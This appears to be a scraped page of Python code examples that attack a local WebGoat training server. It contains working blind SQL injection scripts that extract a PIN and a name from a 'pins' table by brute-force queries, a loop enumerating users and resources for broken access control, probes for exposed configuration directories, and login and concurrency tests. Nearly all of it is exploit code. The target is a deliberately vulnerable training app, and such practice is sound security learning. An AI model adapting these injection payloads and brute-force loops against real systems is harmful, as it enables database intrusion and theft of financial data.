Beispiel #1
0
def my_exploit_Blind_String_SQL_Injection(params):
    url = "http://localhost/WebGoat/attack?" + params
    exploit = '''101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'),  '''
    exploit_supply_b = ", 1) ="
    exploit_supply_l = "'"
    exploit_supply_r = "')"
    result = []
    judge = "Account number is valid"
    http_send = tools.ToolsRequests()
    http_send.set_url(url)
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    params = {'account_number': '', 'SUBMIT': 'Go'}
    for i in range(4):
        for n in string.ascii_letters:
            params['account_number'] = exploit + str(
                i +
                1) + exploit_supply_b + exploit_supply_l + n + exploit_supply_r
            http_send.set_params(params)
            r = http_send.send_post()
            if r.text.find(judge) > 0:
                result.append(n)
    if result:
        return ''.join(result)
    else:
        return ''
def test_ACF_one():
    url = "http://localhost/WebGoat/attack?Screen=7&menu=200"
    params = {"User": "", "Resource": "", "SUBMIT": "Check Access"}
    cookies = {
        "name": "JSESSIONID",
        "value": "3C5844601B61289CBBDE83F302598D76"
    }
    auth = ('guest', 'guest')
    judge = "Congratulations. You have successfully completed this lesson."
    changeUser = ['Moe', 'Larry', 'Curly', 'Shemp']
    selectResource = [
        'Public Share', 'Time Card Entry', 'Performance Review',
        'Time Card Approval', 'Site Manager', 'Account Manager'
    ]
    mark = 0
    condition = [changeUser, selectResource]
    conditionComb = tools.tools_compose(*condition)
    http_send = tools.ToolsRequests()
    http_send.set_url(url)
    #http_send.set_cookie(cookies)
    #http_send.set_auth(auth)
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    for user, account in conditionComb:
        params["User"] = user
        params["Resource"] = account
        http_send.set_params(params)
        r = http_send.send_post()
        if r.text.find(judge) > 0:
            print("可越权访问的用户:" + params["User"])
            print("管理员账户:" + params['Resource'])
            mark = 1
            break
    if mark == 0:
        print('请求访问错误!')
def test_Insecure_Configuration():
    browsing = ['config', 'configuration', 'conf']
    url = 'http://localhost/WebGoat/'
    http_send = tools.ToolsRequests()
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    for b in browsing:
        url_b = url + b
        print(url_b)
        http_send.set_url(url_b)
        r = http_send.send_get()
        print(r.status_code)
def test_Denial_of_Service():
    url = "http://localhost/WebGoat/attack?Screen=3&menu=1200"
    params = {' Username': '', 'Password': '', 'SUBMIT': 'Login'}
    userList = ['jsnow', 'jdoe', 'jplane']
    pwList = ['passwd1', 'passwd2', 'passwd3']
    http_send = tools.ToolsRequests()
    http_send.set_url(url)
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    for i in range(len(userList)):
        params['Username'] = userList[i]
        params['Password'] = pwList[i]
        http_send.set_params(params)
        r = http_send.send_post()
Beispiel #5
0
def concurrency_func(username):
    print(username)
    url = "http://localhost/WebGoat/attack?Screen=26&menu=800"
    http_send = tools.ToolsRequests()
    http_send.set_url(url)
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    params = {}
    params['username'] = username
    params['SUBMIT'] = 'Submit'
    http_send.set_params(params)
    r = http_send.send_post()
    #print(r.text)
    #Account information for user: dave
    if r.text.find('Account information for user: dave') > 0:
        print("dave!")
    elif r.text.find('Account information for user: jeff') > 0:
        print("jeff!")
def test_Blind_Numeric_SQL_Injection():
    '''
    sql盲注,基于返回值的正确或者错误,定位正确数据
    '''
    url = "http://localhost/WebGoat/attack?Screen=56&menu=1100"
    params = {'account_number': '', 'SUBMIT': 'Go'}
    exploit = '''101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') = '''
    exploit_supply = " )"
    judge = "Account number is valid"
    http_send = tools.ToolsRequests()
    http_send.set_url(url)
    headers = mitmSql.mitm_get_headers_by_system_name("mitmhttp", 'localhost')
    http_send.set_headers(headers)
    for n in range(2000, 2500):
        params['account_number'] = exploit + str(n) + exploit_supply
        http_send.set_params(params)
        r = http_send.send_post()
        if r.text.find(judge) > 0:
            print("正确的pin:" + str(n))